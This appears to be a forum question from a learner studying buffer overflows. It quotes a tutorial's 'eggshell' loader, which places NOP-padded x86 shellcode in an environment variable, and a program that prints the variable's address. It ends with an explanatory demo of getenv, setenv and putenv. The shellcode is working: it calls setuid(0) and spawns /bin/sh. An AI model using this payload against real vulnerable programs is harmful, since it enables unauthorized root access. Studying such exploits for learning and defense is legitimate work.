Hi,
I'm learning a thing or two about buffer overflows, and a tutorial I'm reading has the following piece of code:
Code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define NOP 0x90 /* single-byte x86 NOP used to pad the "egg" */
/* shellcode bytes as given by the tutorial, left unchanged */
char shellcode[] =
"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x69\x74\x79\x0a\x68\x65\x63"
"\x75\x72\x68\x44\x4c\x20\x53\x89\xe1\xb2\x0f\xb0\x04\xcd\x80"
"\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53"
"\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
int main(void)
{
char shell[512];
puts("Eggshell loaded into environment.");
memset(shell, NOP, 512); /* fill the whole buffer with NOPs ... */
memcpy(&shell[512 - strlen(shellcode)], shellcode, strlen(shellcode)); /* ... and put the shellcode at its end (note: no terminating NUL is written) */
setenv("EGG", shell, 1); /* creates an "EGG=..." entry holding a copy of shell */
putenv(shell); // [1] hands the string itself (not a copy) to the environment
system("bash"); // [2] starts a child shell that inherits this environment
return 0;
}
Most of it is perfectly clear: it loads the shellcode into an environment variable, but what I am confused about is line [1] and [2]. setenv copies the shellcode, etc. to the environment variable, so what is the point of these 2 lines?
The tutorial also gives a second piece of code (to retrieve the memory address of the environment variable).
Code:
#include <stdio.h>
#include <stdlib.h>
int main(void)
{
/* getenv() returns a char * pointing at the variable's value inside the environment; the cast prints that pointer as a number */
printf("0x%lx\n", (unsigned long)getenv("EGG"));
return 0;
}
This is strange to me (and it doesn't work, I think it gives a segmentation fault), basically it gets the VALUE of the environment variable, so how on earth is it supposed to get its address?
Any help would be appreciated.
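The two things the post is puzzled by, what getenv() actually returns and how setenv() differs from putenv(), can be checked directly. The program below is an added example written for this thread; it is not the tutorial's code, and the variable names DEMO_VAR and DEMO_PUT and the helper find_environ_entry are made up for the demonstration. It shows that the "value" getenv() hands back is a pointer into the environment block itself (so printing that pointer is printing the variable's address), that setenv() stores a copy of the caller's buffer, and that putenv() stores the caller's buffer itself.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;   /* the process environment: NULL-terminated array of "NAME=value" strings */

/* Hypothetical helper: returns the address of the "NAME=value" entry in
   environ that belongs to `name`, or NULL if there is no such entry. */
static char *find_environ_entry(const char *name)
{
    size_t n = strlen(name);
    for (char **e = environ; e != NULL && *e != NULL; e++) {
        if (strncmp(*e, name, n) == 0 && (*e)[n] == '=')
            return *e;
    }
    return NULL;
}

/* setenv() copies its value argument. getenv() then returns a pointer INTO
   the environment's own storage (just after "NAME="), not into the caller's
   buffer. Returns 1 when that is what we observe, 0 otherwise. */
int getenv_returns_pointer_into_environ(void)
{
    char local[] = "hello";               /* constructed sample value */
    if (setenv("DEMO_VAR", local, 1) != 0)
        return 0;
    char *v = getenv("DEMO_VAR");
    char *entry = find_environ_entry("DEMO_VAR");
    if (v == NULL || entry == NULL)
        return 0;
    return v == entry + strlen("DEMO_VAR=") && v != local;
}

/* putenv() does NOT copy: the string passed becomes part of the environment,
   so changing the caller's buffer afterwards changes what getenv() sees.
   Returns 1 when that is what we observe, 0 otherwise. */
int putenv_keeps_callers_buffer(void)
{
    static char buf[] = "DEMO_PUT=one";   /* constructed; static so it outlives the call */
    if (putenv(buf) != 0)
        return 0;
    char *v = getenv("DEMO_PUT");
    if (v == NULL || strcmp(v, "one") != 0)
        return 0;
    buf[9] = 't'; buf[10] = 'w'; buf[11] = 'o';   /* buffer now reads "DEMO_PUT=two" */
    v = getenv("DEMO_PUT");
    return v == buf + 9 && strcmp(v, "two") == 0;
}

int main(void)
{
    setenv("DEMO_VAR", "hello", 1);
    char *v = getenv("DEMO_VAR");
    /* %p prints the pointer itself: that number is the address of the value in memory */
    printf("value \"%s\" lives at %p\n", v, (void *)v);
    printf("getenv returns a pointer into environ: %s\n",
           getenv_returns_pointer_into_environ() ? "yes" : "no");
    printf("putenv keeps the caller's buffer: %s\n",
           putenv_keeps_callers_buffer() ? "yes" : "no");
    return 0;
}
```

Compile with any C compiler on Linux (for example `cc demo.c -o demo`) and run it. The address printed for DEMO_VAR is the same kind of value the tutorial's second program is after: getenv() never copies the value out, it returns where the value already sits. The putenv() part also explains why line [1] in the post is not redundant with setenv(): the two calls do different things with the buffer they are given.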